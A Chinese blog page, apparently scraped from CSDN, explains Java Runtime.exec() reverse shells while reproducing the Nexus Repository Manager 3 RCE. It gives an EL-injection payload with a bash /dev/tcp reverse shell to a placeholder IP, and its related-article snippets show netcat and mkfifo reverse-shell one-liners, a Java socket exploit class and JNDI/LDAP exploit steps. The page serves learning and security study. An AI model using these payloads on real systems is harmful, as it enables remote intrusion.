linux利用java反弹shell_Java Runtime.exe() 执行命令与反弹shell(上)

最新推荐文章于 2024-05-03 13:13:43 发布
最新推荐文章于 2024-05-03 13:13:43 发布
阅读量556 收藏
点赞数
文章标签: linux利用java反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34710938/article/details/114727443
版权

0x00 前言

在自己学习复现 Nexus Repository Manager 3 RCE 漏洞的时候(CVE-2020-10199/10204)

由于自己对 Java 的 Runtime.exec() 执行命令以及反弹shell理解的太过于浅薄,使用了以下语句无法反弹shell,踩了很多坑

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1')}

此处记录一下查阅一些资料和实践后学习到的东西。如有错误,请各位师傅指正

0x01 文件描述符

Q:首先什么是文件?

A:在 Linux 下,一切皆为文件,就连键盘显示器设备都是文件,它们的输入输出都是由文件描述符控制

文件描述符 (简称 fd) :在Linux系统中,当某个程序打开文件时,操作系统返回相应的文件描述符,程序为了处理该文件必须引用此描述符。

而Linux 启动文件的时候,会默认打开三个文件描述符

文件描述0 表示标准输入

文件描述1 表示标准输出

文件描述2 表示标准错误

eb41a0291123

image

/dev/tty0 泛指当前终端

当我们需要让输出不显示在当前TTY上,而是输出到文件或者其他设备,此时我们便需要重定向

0x02 重定向

在执行命令之前,可以使用 shell 可解释的特殊符号来重定向其输入/输出。重定向允许复制、打开、关闭命令的文件句柄,使其引用不同的文件,并且可以更改命令读取和写入的文件。也就是说,先进行重定向,再执行命令

重定向按照从左到右的顺序执行

最后,若省略文件描述符,< 表示对标准输入(文件描述符0)的重定向,> 表示对标准输出(文件描述符1)的重定向

输入重定向

下文中的所有原文都是 bash 5.0 手册里写道

Redirection of input causes the file whose name results from the expansion of

最低0.47元/天 解锁文章
YHhhh18
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux利用java反弹shell_linux反弹shell
weixin_42509888的博客
02-26 400
参考链接http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.htmlhttp://www.waitalone.cn/linux-shell-rebound-under-way.htmlhttp://roo7break.co.uk/?p=215http://pentestmonkey.net/cheat-sheet/shells/re...
反弹Shell原理与实现
m0_62451321的博客
11-14 3129
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
java反弹shell
a807719447的专栏
01-26 2000
import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="xx.xx.xx.xx"; int port=9001; String cmd="/bi.
靶场分享反弹shell
最新发布
2301_81475812的博客
05-03 146
1、存在反弹shell命令java代码文件Exploit.java,通过版本为1.8的jdk工具进行编译,生成Exploit.class文件 2、在存在Exploit.class文件的目录下开启http服务,让开启ldap服务端的工具marshalsec-0.0.3-SNAPSHOT-all.jar来访问这个文件 3、使用工具marshalsec-0.0.3-SNAPSHOT-all.jar开启ldap服务端,并访问Exploit.class文件 4、使用POC来连接ldap服务器端的访问
反弹Shell方法论,Windows篇
大河之犬的博客
10-10 783
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
反弹shell
Massimo__JAVA的博客
04-27 339
环境:攻击者kali:192.168.116.128受害者centos:192.168.116.95kali监听本地7777端口目标机执行反弹shell命令命令解释为:将目标主机的bash shell以-i交互式的方式,标准输出+错误输出重定向到192.168.116.128:7777,而在192.168.116.128:7777的标准输入命令会重定向到192.168.116.128:7777的标准输出中简言而知,就是将目标主机的标准输入、标准输出、错误输出全都重定向到攻击端上。
java_unix_shell.rar_java 模拟 shell_文件管理 java
09-19
标题 "java_unix_shell.rar" 提供的信息表明,这个压缩包包含了一个使用Java语言实现的Unix Shell的模拟系统。Unix Shell是Unix操作系统中的一个命令行接口,用户可以通过它来执行各种系统命令,进行文件管理和系统...
java_shell_template.tar.gz
12-15
Shell脚本是一种在Unix或Linux系统中广泛使用的命令行脚本语言,它允许用户执行一系列命令、操作文件,以及自动化常见的系统任务。在这个场景中,Shell脚本可能读取“field.txt”文件,该文件可能包含了Java类的字段...
Android中级篇之用JAVA代码执行shell命令.rar_Android 执行shell_android_effectoh
09-20
在Android开发中,有时我们需要...综上所述,理解如何在Android应用中使用Java执行shell命令是提高应用功能的关键。同时,要注意安全性和权限管理,合理利用Android提供的SDK API,以实现更加稳定和安全的解决方案。
java连接linux,执行shell命令的工具类 sshxcute.jar
12-24
Java开发中,有时我们需要远程连接到Linux服务器执行shell命令,比如进行系统管理、自动化运维或者数据处理等任务。在这种情况下,使用SSH(Secure Shell)协议是常见的解决方案,因为它提供了安全的网络通信。...
利用app_process实现免root调用shell_Java_下载.zip
04-26
利用`app_process`执行shell命令,我们需要创建一个自定义的Java类,并在该类中调用`Runtime.getRuntime().exec()`方法来执行shell命令。以下是一个简单的示例: ```java public class ShellExecutor { public ...
java调用shell获取错误信息_记一次突破反弹shell
weixin_39994461的博客
11-20 288
这是酒仙桥六号部队的第 106篇文章。全文共计1809个字,预计阅读时长6分钟。背景某天闲着无聊,小伙伴发来一个某网站,说只能执行命令,不能反弹shell。测试对着目标站点一顿测试。发现确实存在shiro反序列化,并且存在可以利用的gadget。利用发现确实可以执行命令,但是我们执行反弹的时候。反弹不回来,emmm。查看各种系命令以及分析。发现是一个精简的Linux,经常用于doc...
linux利用java反弹shell_Linux重定向及反弹shell详解
weixin_36288711的博客
02-26 186
这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell目录0x01 文件描述符0x02 重定向0x03 反弹shell0x04 交互重定向0x05 命令变形0x01 文件描述符Linux的文件描述符有以下三种标准输入:0标准输出:1错误输出:2对于文件描述符就先知道这些就可以了,具体的使用会在重定向中来说,重定向就是对文件描述符的操作0x02 重定向重定向主要分为以下两种...
使用java命令执行函数反弹windows-shell
qq_51478862的博客
04-16 3771
前言 偶尔有时命令执行有效负载Runtime.getRuntime().exec()会失败。使用Webshell,反序列化漏洞或其他向量时可能会发生这种情况。 这是因为重定向和管道字符的使用方式在正在启动的进程的上下文中没有意义。 所以不像在命令框中可以直接运行复杂命令 对于Linux靶机可以使用base64编码命令进行绕过。 bash -c {echo,命令进行base64编码}|{base64,-d}|{bash,-i} 而对于windows系统一直没有解决方法。 而这篇文章就是解决该问题的。 因为语雀
反弹shell总结
桀骜不逊
02-09 1081
nc反弹shell 正向shell nc -lvp 1234 -e /bin/bash # linux 服务端(被攻击的主机) nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服务端(被攻击的主机) nc host.example.com 1234 # linux 客户端 rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l host.example.
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1036
vulhub漏洞复现练习篇
反弹shell从入门到进阶
飞鱼的企鹅的博客
10-14 322
前言 在渗透测试过程中,反弹shell是获取到权限的一种很重要的方式,一直用那些反弹shell命令却不知道是什么意思,现在来专门学习一下原理。 什么是反弹shell 反弹shell(reverse shell),就是监控端在监控某TCP/UDP端口,被控制端使用漏洞或其他方法发起请求到该端口,并将其命令行的输入输出转到控制端。 为什么要反弹shell 当我们已经打开了被攻击机的相应端口,如22,...
反弹shell命令大全
G3et的博客
03-21 875
【代码】反弹shell命令大全。
请将shell语句转化为pytthon: source ./get_directory_list.sh source ./printf_coloring.sh source ./check_directory.sh source ./check_tools_exist.sh check_all_directory_exist ./clean_output_directory.sh ./clean_build_directory.sh ./RebuildProject.sh
07-09
上述代码使用 `subprocess.call` 函数来执行每个Shell命令,其中第一个参数是命令和参数的列表形式,`shell=True` 参数用于告诉Python运行一个Shell解释器来执行命令。请确保在运行代码之前安装了 `subprocess` 模块...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值